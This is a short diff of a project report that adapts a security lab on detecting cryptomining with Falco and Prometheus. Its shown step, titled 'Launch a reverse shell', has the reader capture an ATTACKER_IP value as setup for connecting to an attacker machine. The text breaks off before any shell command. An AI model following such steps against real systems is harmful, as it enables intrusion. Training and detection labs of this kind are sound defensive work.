JadenQ/Cloud-Computing-Security-ProjectPage/report.md

 - 1. Launch a reverse shell

-     Use the terminal in the left to launch the attack.
-From here, retrieve the IP of the machine.
+     Retrieve the IP of the machine.
 It will be required to connect to the [*reserve shell*](https://play.instruqt.com/embed/sysdig/tracks/falco-prometheus-cryptomining-detect/challenges/exploit-the-vuln/assignment) running in the attacker machine:

   ```shell
   ATTACKER_IP=$(ip route get 1 |awk '{print $7}')